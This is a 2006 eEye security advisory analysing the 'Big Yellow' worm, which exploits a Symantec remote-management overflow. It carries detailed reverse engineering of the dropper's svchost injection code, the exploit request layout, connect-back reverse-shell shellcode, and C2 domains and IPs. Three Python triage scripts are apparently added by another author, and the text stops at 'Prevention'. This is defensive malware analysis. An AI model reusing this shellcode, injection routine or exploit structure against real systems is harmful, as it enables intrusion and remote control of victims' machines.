Worm Alert: Big Yellow
Date:
12/15/2006 12:00:00 AM
Severity:
High
Affected Software:
Symantec Client Security for Windows
3.1 - 3.1.0.394
3.1 - 3.1.0.400
3.0 - 3.0.2.2000
3.0 - 3.0.2.2001
3.0 - 3.0.2.2010
3.0 - 3.0.2.2020
3.0 - 3.0.1.1007
3.0 - 3.0.1.1000
Symantec Antivirus Corporate Edition for Windows
10.1 - 10.1.0.394
10.1 - 10.1.0.400
10.1 - 10.1.0.394 64 bit
10.0 - 10.0.2.2000
10.0 - 10.0.2.2001
10.0 - 10.0.2.2010
10.0 - 10.0.2.2020
10.0 - 10.0.1.1007
10.0 - 10.0.1.1000
Overview:
The eEye Research honeypot network has detected a new worm that actively exploits a remote Symantec vulnerability (SYM06-010, reachable on TCP port 2967) originally discovered by eEye Research on May 24, 2006 and patched by Symantec on June 12, 2006. The vulnerability has been publicly exploited since at least November 30, but this is the first example of a worm using it for self-propagation. Patch processes are generally not in place for non-Microsoft applications such as Symantec AntiVirus/Client Security, so many Symantec deployments may still be exposed throughout their networks. All enterprises running this software should assess their posture against the worm as soon as possible: confirm that every host runs a patched version of Symantec AntiVirus/Client Security, and block TCP port 2967 at the gateway to reduce the attackable surface.
Technical Analysis:
NL.EXE
Worm dropper downloaded from ftp://ftpd.3322.org:21211/NL.eXe via instructions sent to the command shell opened by the SYM06-010 exploit.
1) Sleep for 10 seconds
2) calls CRTDLL.DLL!_access to check for read access to
"%SystemRoot%\system32\wuauclt.dll"; if the call fails, then
"wuauclt.dll" is assumed to not exist, and execution jumps to step 5
3) MoveFileExA(
"%SystemRoot%\system32\wuauclt.dll",
"%SystemRoot%\system32\wuauclt.dll.bak",
MOVEFILE_REPLACE_EXISTING)
- this renames "wuauclt.dll" to "wuauclt.dll.bak"
4) MoveFileExA(
"%SystemRoot%\system32\wuauclt.dll.bak",
NULL,
MOVEFILE_DELAY_UNTIL_REBOOT)
- this marks "wuauclt.dll.bak" to be deleted on reboot
5) decodes the DLL embedded within itself as binary data by XORing each
byte by 0x52
5a) CreateFileA(
"%SystemRoot%\system32\wuauclt.dll",
GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL)
- creates new "wuauclt.dll" file for writing
5b) writes the decoded DLL to the file using WriteFile
6) calls CRTDLL.DLL!_access to check for read access to the newly-created
"%SystemRoot%\system32\wuauclt.dll"; if the call fails, then
"wuauclt.dll" is assumed to not exist, and execution jumps to step 9
7) checks "%SystemRoot%\system32\svchost.exe" for write access using the
following operations, but doesn't do anything with the result:
7a) CreateFileA(
"%SystemRoot%\system32\svchost.exe",
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)
- opens "svchost.exe" for read access, to read its file times
7b) calls GetFileTime to retrieve "svchost.exe"'s last-modified,
last-accessed, and creation times
7c) CreateFileA(
"%SystemRoot%\system32\svchost.exe",
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)
- opens "svchost.exe" for write access, so it can attempt to
set its file times (to what they already are; this is just an
inert write operation)
7d) calls SetFileTime to restore the file's times
8) injects the new "wuauclt.dll" into the first "svchost.exe" process
encountered via the following operations:
8a) creates a structure for the injected code to use:
+0000h [104h] full path and file name of "wuauclt.dll"
+0104h [104h] command-line argument ("Run" or "Install")
+0208h PTR KERNEL32.DLL!LoadLibraryA
+020Ch PTR KERNEL32.DLL!GetProcAddress
- the command-line argument is "Run" unless main's argv[1] is
"-Install"
8b) searches for a process named "svchost.exe" using the following
operations:
8ba) CreateToolhelp32Snapshot(
TH32CS_SNAPPROCESS,
0)
- this creates a "snapshot" containing an enumeration of
processes currently running on the system
8bb) uses Process32First and Process32Next to iterate through
enumerated processes; searches for a process named
"svchost.exe"
8bc) when a matching process is found, its Process ID (PID) is
passed to OpenProcess at step 8d
8bd) if no matching process is found, execution jumps to step 9
8c) attempts to acquire SeDebugPrivilege using OpenProcessToken,
LookupPrivilegeValueA, and AdjustTokenPrivileges
- SeDebugPrivilege allows even system processes to be opened
with full access
8d) attempts to open the "svchost.exe" process located in steps
8ba..8bd using OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if
this fails, execution jumps to step 9
8e) VirtualAllocEx(
"svchost.exe" process handle,
NULL,
0x210, (size of structure created at step 8a)
MEM_COMMIT,
PAGE_READWRITE)
- this allocates memory within the target "svchost.exe" process
that will be used to pass information to the injection code;
if this fails, the process handle is closed and execution
jumps to step 9
8f) copies the structure into the memory allocated in the
"svchost.exe" process using WriteProcessMemory; if this fails,
the memory is freed, the process handle is closed, and execution
jumps to step 9
8g) VirtualAllocEx(
"svchost.exe" process handle,
NULL,
0x210,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE)
- this allocates memory within the target "svchost.exe" process
that will be used to contain the machine code to be injected;
if it fails, all previously allocated memory is freed, the
process handle is closed, and execution jumps to step 9
8h) copies the following machine code into the "svchost.exe" using
WriteProcessMemory; if this fails, all previously allocated
memory is freed, the process handle is closed, and execution
jumps to step 9:
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+8] ; ThreadProc's lpvParameter, which points
; to the structure created at step 8a,
; allocated at step 8e, and copied into
; the process at step 8f
push edi ; full file name of "wuauclt.dll"
call dword ptr [edi+208h] ; KERNEL32.DLL!LoadLibraryA
mov esi, eax
or esi, esi
jz short loc_401267
mov eax, edi
add eax, 104h
push eax ; either "Run" or "Install"
push esi
call dword ptr [edi+20Ch] ; KERNEL32.DLL!GetProcAddress
mov [ebp-4], eax
call [ebp-4] ; call "Run" or "Install" export
loc_401267:
xor eax, eax
pop edi
pop esi
leave
ret 4
8i) attempts to execute the injected machine code within the target
"svchost.exe" process using CreateRemoteThread with the
'lpStartAddress' argument pointing to the memory allocated at
step 8g and filled with the code at step 8h; if this fails, all
previously allocated memory is freed, the process handle is
closed, and execution jumps to step 9
8j) the newly-created thread's handle and the "svchost.exe" process
handle are both closed
8k) SeDebugPrivilege is disabled for the NL.EXE process using the
same APIs as in step 8c
9) self-destructs by creating a batch file that will continuously attempt
to delete the NL.EXE file, then runs the batch file:
9a) retrieves the full path and file name of the NL.EXE executable
using GetModuleFileNameA with the module handle returned by
GetModuleHandleA(NULL); this will be used later when constructing
the batch file
9b) builds a random batch file name of the form "%TMP%NL###.bat",
where each # represents a random digit from 0 to 8, generated
using (CRTDLL.DLL!rand() % 9); the random number generator is
apparently never seeded, so this batch file name should be the
same every time
9c) SetFileAttributesA(
full path and file name of "NL.EXE",
FILE_ATTRIBUTE_NORMAL)
- resets file attributes on "NL.EXE", perhaps just to make sure
the file isn't read-only
9d) CreateFileA(
batch file name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
0,
NULL)
- this creates the new batch file with write access; if this
fails, the program ends
9e) writes the following contents to the batch file, using WriteFile,
then closes the handle to the batch file
@ECHO OFF
:Repeat
DEL "full path and file name of NL.EXE"
Ping 0.0.0.0
IF EXIST "full path and file name of NL.EXE" GOTO Repeat
DEL "%0"
- "Ping 0.0.0.0" is presumably intended to insert a brief delay
between deletion attempts, while the "DEL %0" command causes
the batch file to delete itself once the delete loop breaks
- the program ends if WriteFile fails
9f) the batch file is executed using ShellExecuteA
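Step 5 above (a DLL stored inside the dropper and encoded by XORing every byte with 0x52) is the part of NL.EXE a responder most often has to reverse on the bench. The following is an added example, not code from the advisory or from eEye: it carves a single-byte-XOR-encoded PE out of a dropper image by searching for the encoded "MZ" signature, validating the decoded headers, and sizing the file from its section table, so a false hit on the two-byte signature is skipped rather than carved. The key is the one the advisory reports; the dropper bytes it runs on are a constructed stand-in (a minimal hand-built one-section DLL), not NL.EXE.

```python
import struct

XOR_KEY = 0x52                  # single-byte key the advisory reports for NL.EXE
IMAGE_FILE_DLL = 0x2000         # IMAGE_FILE_HEADER.Characteristics flag
SECTION_HDR_SIZE = 40


def xor_decode(buf, key=XOR_KEY):
    return bytes(b ^ key for b in buf)


def pe_extent(img):
    """Validate a decoded PE starting at img[0]; return (size_on_disk, is_dll)
    or None if the headers do not check out.  Size on disk is the furthest
    end of any section's raw data."""
    if len(img) < 0x40 or img[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", img, 0x3C)[0]              # e_lfanew
    if pe + 24 > len(img) or img[pe:pe + 4] != b"PE\0\0":
        return None
    nsec = struct.unpack_from("<H", img, pe + 6)[0]          # NumberOfSections
    opt_size, chars = struct.unpack_from("<HH", img, pe + 20)  # SizeOfOptionalHeader, Characteristics
    sec_tab = pe + 24 + opt_size
    end = sec_tab + nsec * SECTION_HDR_SIZE
    if nsec == 0 or nsec > 96 or end > len(img):
        return None
    for i in range(nsec):
        raw_size, raw_ptr = struct.unpack_from(
            "<II", img, sec_tab + i * SECTION_HDR_SIZE + 16)  # SizeOfRawData, PointerToRawData
        end = max(end, raw_ptr + raw_size)
    return end, bool(chars & IMAGE_FILE_DLL)


def carve_xor_pe(blob, key=XOR_KEY, header_probe=0x1000):
    """Find every XOR-`key`-encoded PE in blob.  Candidates are the positions
    of the encoded 'MZ'; each is decoded far enough to validate the headers,
    and candidates that fail validation are skipped."""
    sig = xor_decode(b"MZ", key)
    found = []
    i = blob.find(sig)
    while i >= 0:
        ext = pe_extent(xor_decode(blob[i:i + header_probe], key))
        if ext is None:
            i = blob.find(sig, i + 1)
            continue
        size, is_dll = ext
        found.append({"offset": i, "size": size, "is_dll": is_dll,
                      "image": xor_decode(blob[i:i + size], key)})
        i = blob.find(sig, i + size)
    return found


def build_sample_dropper():
    """Constructed test input (not NL.EXE): a minimal one-section DLL,
    XOR-0x52 encoded and padded on both sides with filler."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)  # i386, 1 section, DLL
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)              # PE32 magic, rest zeroed
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x10, 0x1000, 0x10, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + section
    image = headers.ljust(0x200, b"\0") + b"\xC3" * 0x10                  # raw data at file offset 0x200
    return b"\x90" * 0x300 + xor_decode(image) + b"\0" * 0x100


if __name__ == "__main__":
    for hit in carve_xor_pe(build_sample_dropper()):
        print("PE at %#x, %#x bytes, DLL=%s" % (hit["offset"], hit["size"], hit["is_dll"]))
```

To use it on a real sample, read the dropper with `open(path, "rb").read()` and write each `hit["image"]` to disk; if a different dropper uses another key, brute-forcing all 256 single-byte keys against the "MZ"/"PE" check is a two-line change.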
SVCHOST.EXE
Worm propagation core; exploits the SYM06-010 TCP/2967 vulnerability.
1) uses GetModuleFileNameA with an 'hModule' argument of the return value
from GetModuleHandleA(NULL) to get its own file name. If this name
matches "%SystemRoot%\system32\wins\svchost.exe" (case-sensitively),
execution jumps to step 6
2) sets the file attributes of "%SystemRoot%\system32\wins\svchost.exe"
to FILE_ATTRIBUTE_NORMAL using SetFileAttributesA, presumably to remove
the read-only attribute if it is somehow set.
3) copies itself to "%SystemRoot%\system32\wins\svchost.exe" using
CopyFileA; if this fails, execution jumps to step 5 (self-destruct)
4) CreateProcessA(
NULL,
"%SystemRoot%\system32\wins\svchost.exe",
NULL,
NULL,
TRUE,
NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,
NULL,
NULL,
&pi,
&si)
- this executes the newly copied "svchost.exe"; if it fails, execution
jumps to step 6
- otherwise, the newly copied "svchost.exe" is now running, so the
current one can terminate and be deleted
5) the current executable prepares to self-destruct using the same batch
file technique seen in NL.EXE, then exits with CRTDLL.DLL!exit(0)
5a) retrieves the full path and file name of the current executable
using GetModuleFileNameA with the module handle returned by
GetModuleHandleA(NULL); this will be used later when constructing
the batch file
5b) builds a random batch file name of the form "%TMP%NL###.bat",
where each # represents a random digit from 0 to 8, generated
using (CRTDLL.DLL!rand() % 9); the random number generator is
apparently not seeded, so this batch file name should be the
same every time
5c) SetFileAttributesA(
full path and file name of the current executable,
FILE_ATTRIBUTE_NORMAL)
- resets file attributes on the current executable, perhaps just
to make sure the file isn't read-only
5d) CreateFileA(
batch file name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
0,
NULL)
- this creates the new batch file with write access; if this
fails, the program ends
5e) writes the following contents to the batch file, using WriteFile,
then closes the handle to the batch file
@ECHO OFF
:Repeat
DEL "full path and file name of current executable"
Ping 0.0.0.0
IF EXIST "full path and file name of current executable" GOTO Repeat
DEL "%0"
- "Ping 0.0.0.0" is presumably intended to insert a brief delay
between deletion attempts, while the "DEL %0" command causes
the batch file to delete itself once the delete loop breaks
- the program ends if WriteFile fails
5f) the batch file is executed using ShellExecuteA
6) initializes Winsock v2.2 using WS2_32.DLL!WSAStartup; if this fails,
the program terminates with return code 0
7) gets the starting IP address for propagation, based on the local
system's first IP address
7a) the output from WS2_32.DLL!gethostname is passed into
WS2_32.DLL!gethostbyname, and the first IP address from the list
is used in the following steps
7b) the IP address is converted to a string using inet_ntoa, then
tokenized and converted back into four numerical octets using
strtok and atoi
7c) if the IP address is of the form 192.168.x.x, the starting IP address
is recorded as 192.168.0.1
7d) if the IP address is of the form 10.x.x.x, the starting IP address is
recorded as 10.0.0.1
7e) otherwise, the 3rd octet of the system's IP address is reduced
by 10 (it becomes 0 if it is less than 10), and the 4th octet is zeroed,
to produce the starting IP address for propagation
- to summarize:
192.168.x.x --> 192.168.0.1
10.x.x.x --> 10.0.0.1
else: a.b.c.d --> a.b.(max(c-10, 0)).0
8) starts 512 exploit threads with CreateThread, then goes dormant using
Sleep(INFINITE); the operations of these exploit threads are described
below, with lettered rather than numbered steps
A) (begin exploitation loop) generates the next target IP address using
the following:
Aa) advance IP octets within the ranges
{10-240}.{0-254}.{0-254}.{1-254}; represented in C:
if (++dwOctet4 > 254)
{
dwOctet4 = 1;
if (++dwOctet3 > 254)
{
dwOctet3 = 0;
if (++dwOctet2 > 254)
{
dwOctet2 = 0;
if (++dwOctet1 > 240)
dwOctet1 = 10;
}
}
}
Ab) rebuilds the octets as an IP address string using itoa, strcpy,
and strcat
B) creates a TCP/IP socket using socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
C) attempts to connect to TCP port 2967 on the newly generated target IP
address; if this fails, the socket is closed and execution jumps to
step A
D) the SYM06-010 exploit is sent to TCP port 2967 on the target, bearing
connect-back shellcode to spawn a CMD.EXE that will receive commands
from 61.172.250.59:12345
Da) the shellcode is prepared by embedding the above-mentioned IP
address and port into its XOR-encoded (XOR 0x99) portion where
the sockaddr structure is initialized for connect-back
Db) WSAStartup is called again; the exploitation routine aborts if it
fails
Dc) creates a TCP/IP socket with
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if this fails,
WSACleanup is called and the exploitation routine aborts
Dd) connects to the target IP address on TCP port 2967; if this fails,
the socket is closed, WSACleanup is called, and the routine aborts
De) the SYM06-010 exploit is sent over the connection, the socket is
closed, and WSACleanup is called
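Steps 7 and A together determine which addresses an infected host will hammer on TCP/2967, which is what a responder needs when deciding where to look for follow-on infections. The following is an added example, not the worm's code and not from the advisory: it reimplements the start-address derivation and the octet "odometer" exactly as described above and enumerates the first targets for a given local IP. Two points are my assumptions and are marked in the code: the first probe goes to the successor of the start address (because step A advances before step C connects), and the 512 threads are treated as one sequence because the analysis does not say whether they share a counter.

```python
def starting_address(local_ip):
    """Step 7: derive the sweep start from the host's first IP.  Private
    ranges restart at .0.1 / 0.0.1; anything else backs the third octet off
    by ten (floored at 0) and zeroes the fourth."""
    a, b, c, d = (int(x) for x in local_ip.split("."))
    if (a, b) == (192, 168):
        return (192, 168, 0, 1)
    if a == 10:
        return (10, 0, 0, 1)
    return (a, b, max(c - 10, 0), 0)


def advance(octets):
    """Step Aa: the worm's odometer over {10-240}.{0-254}.{0-254}.{1-254}."""
    a, b, c, d = octets
    d += 1
    if d > 254:
        d = 1
        c += 1
        if c > 254:
            c = 0
            b += 1
            if b > 254:
                b = 0
                a += 1
                if a > 240:
                    a = 10
    return (a, b, c, d)


def in_sweep_range(ip):
    """True if an address lies inside the odometer's wrap-around range
    (first octet 10-240, last octet 1-254, no 255 anywhere).  Hosts outside it
    are only ever probed if the start address happened to be near them."""
    a, b, c, d = (int(x) for x in ip.split("."))
    return 10 <= a <= 240 and b <= 254 and c <= 254 and 1 <= d <= 254


def targets(local_ip, count):
    """First `count` addresses an infected host with this IP probes on
    TCP/2967.  Assumptions: the loop advances before connecting, so the
    first probe is the successor of the start address; all threads are
    modelled as a single sequence."""
    cur = starting_address(local_ip)
    out = []
    for _ in range(count):
        cur = advance(cur)
        out.append("%d.%d.%d.%d" % cur)
    return out


if __name__ == "__main__":
    # A host at 172.16.25.9 starts sweeping at 172.16.15.1, not in its own /24.
    print(targets("172.16.25.9", 5))
    print(targets("192.168.5.7", 3))
```

Because the sweep starts ten /24s below the host's own network for public and 172.16/12 addresses, a compromised host's first probes land on other people's networks; a flow-log query for outbound SYNs to port 2967 from an internal address is a better indicator than anything seen on the local segment.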
WUAUCLT.DLL
"NameLess Eternity Build20061130" bot service component, dropped by NL.EXE and injected into a system process for subsequent self-installation.
- Install opens the registry key "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" and sets the "Start" value to 2 (SERVICE_AUTO_START), so the Automatic Updates service is started at boot. It then opens HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters and sets the "ServiceDll" value to the path of the running bot DLL, so the service host loads the bot whenever the service starts: the bot persists by hijacking the Automatic Updates service rather than by registering a service of its own.
- Run does the same thing as Install initially. It then checks for an Internet connection and loops until it gets one, after which it attempts to connect to the controlling IRC server, alternating between NameLess.3322.org and NameLessBak.3322.org.
Once connected, it joins channel #VNL with password "lol" and waits there for commands from the operator. Below is a list of the commands I see in the command handler and what the response is for some of them:
Available BotNet Commands:
- PING (returns PONG and may execute a JOIN)
- 001 (executes USERHOST, MODE -x +i, JOIN, and MODE -o)
- 005 (looks to be same as 001)
- 302 (looks for an '@' in a local variable, does a string copy, and waits for the next command)
- 433 (executes NICK)
- KICK (does lots of string copying and comparing and then executes a JOIN)
- NICK (more strcmp and strncpy)
- PART ?
- QUIT ?
- 353 ?
- NOTICE (evaluating)
- jojogirl (this appears to get info in the form of “[mi] :) -> li -> %s” to get dumped back to the channel via a NOTICE or PRIVMSG)
- 332 (functions similarly to jojogirl with "[mi] :) -> lo -> %s")
- vs (dumps version information to the channel: "Build20061130", "NameLess Eternity Version", "[mi] :) -> %s -> %s")
- rm (“[mi] :) -> rm…” followed by the execution of “QUIT ::) -> rm\r\n”, the process then kills itself off and deletes the file on reboot)
- ws (dumps information in the form of "[ts] :) -> %s(%d) k")
- ir (similar "[ir] :) -> %s")
- ct (sets up a locale to the user default, executes a JOIN and dumps "[ct] :) -> %s -> %s")
- ud (dumps "Build20061130" and "[ud] :) -> %s" and spawns a thread to download an updated DLL file if the bot's version doesn't match the one the channel controller specifies)
- dl (does the same kind of thing as ud, but without the version check)
- s (does a bunch of string copies and dumps info "[s] :) -> %s:%s -> %s" and spawns a thread)
- ss (very similar to s "[ss] :) -> %s:%s -> %s" with strncpy and thread spawning)
Exploit Request
Canned request for the Symantec remote management service on TCP/2967, handled by
Symantec's Rtvscan.exe. The exploit request is contained within the worm's SVCHOST.EXE.
ScsComms.dll header
BYTE 01h ; version = 1
BYTE 10h ; size of message header = 10h
WORD 0F20h ; (big-endian) length of message data
BYTE 0Ah ; message command = 10 (0Ah) for Rtvscan message
BYTE 00h ; response flag = 0 for request, 1 for response
BYTE 00h ; SSL error code (0)
BYTE 00h ; (unused)
DWORD 02180001h ; (big-endian) message ID
DWORD 00h ; (unused)
Rtvscan.exe header
BYTE 00h ; = 0
BYTE 24h ; request command = COM_FORWARD_LOG
BYTE 00h ; = 0
BYTE 14h ; response flag?
DWORD D9D2C9B7h ; (unknown)
DWORD 34EF333Eh ; (unknown)
DWORD 00431F25h ; (unknown)
Rtvscan.exe message body
WORD 0202h ; length of following string (1st)
[202h] "\\/aaa...abbb...b"
WORD 0101h ; length of following string (2nd)
[101h] "\"\"\"...\""
WORD 0101h ; length of following string (3rd)
[101h] "ddd...d"
WORD 0101h ; length of following string (4th)
[101h] "eee...e"
WORD 0101h ; length of following string (5th)
[101h] "fff...f"
WORD 0101h ; length of following string (6th)
[101h] "ggg...g"
WORD 0101h ; length of following string (7th)
[101h] "hhh...h"
WORD 0101h ; length of following string (8th)
[101h] "iii...i"
WORD 0101h ; length of following string (9th)
[101h] "jjj...j"
WORD 0101h ; length of following string (10th)
[101h] "kkk...k"
WORD 0101h ; length of following string (11th)
[...] "lll...lAA" (shellcode) "mmm...m",0
SHELLCODE
Standard connect-back shellcode embedded in the SYM06-010 exploit request contained within the worm's SVCHOST.EXE.
;;
;; XOR-0x99 decode loop
;;
jmp short loc_403BA8
dd 501E100Dh ; "return address" in CBA.DLL for SEH overflow
; (code at address is "POP ECX / POP ECX / RET")
db "mm"
loc_403BA8:
jmp short loc_403BB9
loc_403BAA:
pop ebx
xor ecx, ecx
mov cx, 214h
loc_403BB1: ; XOR-0x99 decode loop
xor byte ptr [ebx], 99h
inc ebx
loop loc_403BB1
jmp short loc_403BBE
loc_403BB9:
call loc_403BAA ; push pointer to XOR-encoded portion
loc_403BBE:
;;
;; XOR-0x99-encoded portion
;;
jmp loc_FB
loc_5:
pop edx ; EDX -> "GetProcAddress",0
mov eax, fs:[30h] ; -> PEB
mov eax, [eax+0Ch] ; -> PEB loader data
mov esi, [eax+1Ch] ; InInitializationOrderModuleList
lodsd ; second module in the initialization-order list
mov eax, [eax+8] ; LDR_MODULE.BaseAddress
mov ebx, eax ; EBX = base address of KERNEL32.DLL (true on the Windows
; versions current at the time; this list order is not guaranteed on later releases)
mov esi, [ebx+3Ch] ; IMAGE_DOS_HEADER.e_lfanew
add esi, ebx
mov esi, [esi+78h] ; IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[
; IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
add esi, ebx ; ESI -> KERNEL32.DLL export directory
mov edi, [esi+20h] ; IMAGE_EXPORT_DIRECTORY.AddressOfNames
add edi, ebx
mov ecx, [esi+14h] ; IMAGE_EXPORT_DIRECTORY.NumberOfFunctions
xor ebp, ebp
push esi
loc_2D:
push edi ; GetProcAddress export lookup loop
push ecx
mov edi, [edi]
add edi, ebx
mov esi, edx
push 0Eh ; length of "GetProcAddress"
pop ecx
repe cmpsb
je short loc_44
pop ecx
pop edi
add edi, 4
inc ebp
loop loc_2D
loc_44:
pop ecx
pop edi
pop esi
mov ecx, ebp
mov eax, [esi+24h] ; IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
add eax, ebx
shl ecx, 1
add eax, ecx
xor ecx, ecx
mov cx, [eax]
mov eax, [esi+1Ch] ; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
add eax, ebx
shl ecx, 2
add eax, ecx
mov eax, [eax]
add eax, ebx ; EAX = KERNEL32.DLL!GetProcAddress
mov edi, edx
mov esi, edi
add esi, 0Eh ; ESI -> strings after "GetProcAddress",0
mov edx, eax
push 3
pop ecx
call _lookup_exports_from_module_ebx
add esi, 0Dh ; skip over "LoadLibraryA",0 string
push edx
push esi ; ESI -> "ws2_32",0
call dword ptr [edi-4] ; LoadLibraryA
pop edx
mov ebx, eax ; EBX = base address of WS2_32.DLL
push 2
pop ecx
call _lookup_exports_from_module_ebx
; EDI-18h KERNEL32.DLL!GetProcAddress
; EDI-14h KERNEL32.DLL!CreateProcessA
; EDI-10h KERNEL32.DLL!ExitThread
; EDI-0Ch KERNEL32.DLL!LoadLibraryA
; EDI-08h WS2_32.DLL!WSASocketA
; EDI-04h WS2_32.DLL!connect
sub esp, 44h ; allocate stack space for STARTUPINFO
mov esi, esp
push 10h
pop ecx
loc_91:
mov [esi+ecx*4], eax ; STARTUPINFOA = {0} loop
loop loc_91
push eax
push eax
push eax
push eax
push 1
push 2
call dword ptr [edi-8] ; WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
mov ebx, eax
mov [esi+38h], ebx
mov [esi+3Ch], ebx
mov [esi+40h], ebx
mov word ptr [esi+2Ch], 101h ; STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea eax, [edi+10h]
push eax
push esi
xor eax, eax
push eax
push eax
push eax
push 1 ; CreateProcessA: bInheritHandles = TRUE
push eax
push eax
lea edx, [edi+3Ch]
mov dword ptr [edx], 646D63h ; "cmd",0
push edx
push eax
call dword ptr [edi-14h] ; KERNEL32.DLL!CreateProcessA
mov dword ptr [edi], 39300002h ; AF_INET / htons(12345)
mov dword ptr [edi+4], 100007Fh ; 127.0.0.1
push 10h
push edi
push ebx
call dword ptr [edi-4] ; WS2_32.DLL!connect
push eax
call dword ptr [edi-10h] ; KERNEL32.DLL!ExitThread
_lookup_exports_from_module_ebx proc
xor eax, eax ; advance past current string at ESI
lodsb
test eax, eax
jnz short _lookup_exports_from_module_ebx
push ecx
push edx
push esi
push ebx
call edx ; KERNEL32.DLL!GetProcAddress
pop edx
pop ecx
stosd
loop _lookup_exports_from_module_ebx
xor eax, eax
ret
_lookup_exports_from_module_ebx endp
loc_FB:
call loc_5 ; pushes pointer to string table
db "GetProcAddress",0
db "CreateProcessA",0
db "ExitThread",0
db "LoadLibraryA",0
db "ws2_32",0
db "WSASocketA",0
db "connect",0
Detection:
eEye Digital Security's Retina Network Security Scanner has audited for this vulnerability, as RTH 4657 "Symantec Remote Management Stack Buffer Overflow", since the vulnerability was reported and patched (discovered by eEye on May 24, 2006; patched by Symantec on June 12, 2006). This audit will identify all hosts that are affected by this vulnerability and are at risk of exploitation by this worm.
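Scanning tells you who is vulnerable; a captured TCP/2967 payload tells you who the worm is calling home to. As an added example (not eEye's code and not part of the advisory), the following Python triage script applies the shellcode analysis above to a captured payload: it locates the XOR-0x99 decoder loop, decodes the 0x214-byte region that follows it, checks the decode against the API-name string table at the end of the stub, and pulls the connect-back address out of the two `mov dword ptr [edi]` / `mov dword ptr [edi+4]` stores that fill the sockaddr_in. The decoder's byte pattern is my hand assembly of the listing and is an assumption to verify against a real capture; the payload it runs on is constructed from the listing, not a captured packet.

```python
import struct

XOR_KEY = 0x99
ENCODED_LEN = 0x214                          # from "mov cx, 214h" in the decoder
SEH_RET = struct.pack("<I", 0x501E100D)      # "pop ecx / pop ecx / ret" in CBA.DLL
# Decoder tail as hand-assembled from the listing (assumption; confirm on a real capture):
#   80 33 99        xor byte ptr [ebx], 99h
#   43              inc ebx
#   E2 FA           loop back to the xor
#   EB 05           jmp short over the call
#   E8 EC FF FF FF  call back to "pop ebx" (pushes the encoded region's address)
DECODER_TAIL = bytes.fromhex("80339943E2FAEB05E8ECFFFFFF")
STRING_TABLE = (b"GetProcAddress\0CreateProcessA\0ExitThread\0"
                b"LoadLibraryA\0ws2_32\0WSASocketA\0connect\0")


def xor_decode(buf, key=XOR_KEY):
    return bytes(b ^ key for b in buf)


def encoded_region(blob):
    """The 0x214 XOR-encoded bytes that follow the decoder, or None."""
    i = blob.find(DECODER_TAIL)
    if i < 0:
        return None
    region = blob[i + len(DECODER_TAIL):i + len(DECODER_TAIL) + ENCODED_LEN]
    return region if len(region) == ENCODED_LEN else None


def connect_back(decoded):
    """Recover the sockaddr_in built before connect(): C7 07 imm32 stores
    AF_INET and htons(port) at [edi], C7 47 04 imm32 stores the IP at [edi+4]."""
    i = decoded.find(b"\xC7\x07")
    while i >= 0:
        if decoded[i + 6:i + 9] == b"\xC7\x47\x04" and len(decoded) >= i + 13:
            family = struct.unpack_from("<H", decoded, i + 2)[0]
            if family == 2:                                        # AF_INET
                port = struct.unpack_from(">H", decoded, i + 4)[0]  # htons: network order in memory
                ip = ".".join(str(b) for b in decoded[i + 9:i + 13])
                return ip, port
        i = decoded.find(b"\xC7\x07", i + 1)
    return None


def analyze(blob):
    """Triage one captured TCP/2967 payload: decoder present? SEH gadget
    address present? did the decode succeed? where does it connect back?"""
    result = {"decoder": False, "seh_ret": SEH_RET in blob, "decoded": False, "c2": None}
    region = encoded_region(blob)
    if region is None:
        return result
    plain = xor_decode(region)
    result["decoder"] = True
    # The API-name string table is a cheap check that the key was right.
    result["decoded"] = b"GetProcAddress\0" in plain and b"ws2_32\0" in plain
    if result["decoded"]:
        result["c2"] = connect_back(plain)
    return result


def build_sample(ip=(61, 172, 250, 59), port=12345):
    """Constructed payload: SEH record, decoder stub, and an XOR-0x99 region
    holding only the sockaddr stores and the string table from the listing."""
    plain = b"\x90" * 0x20
    plain += b"\xC7\x07" + struct.pack("<H", 2) + struct.pack(">H", port)  # mov [edi], family|port
    plain += b"\xC7\x47\x04" + bytes(ip)                                    # mov [edi+4], ip
    plain += b"\x90" * 0x20 + STRING_TABLE
    plain = plain.ljust(ENCODED_LEN, b"\x90")
    head = (b"\xEB\x06" + SEH_RET + b"mm"          # jmp short; dd 501E100Dh; db "mm"
            + b"\xEB\x0F"                           # jmp short to the call
            + b"\x5B\x33\xC9\x66\xB9\x14\x02")      # pop ebx; xor ecx,ecx; mov cx,214h
    return b"l" * 0x40 + b"AA" + head + DECODER_TAIL + xor_decode(plain) + b"m" * 0x20


if __name__ == "__main__":
    print(analyze(build_sample()))
```

On real traffic, feed `analyze()` the reassembled stream; the worm described here patches 61.172.250.59:12345 into the template (the listing shows the unpatched 127.0.0.1 placeholder), so a mismatch in the recovered address is the first sign of a variant.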
Prevention:
Users of eEye Digital Security's Blink have been protected against this vulnerability since its discovery at two different layers:
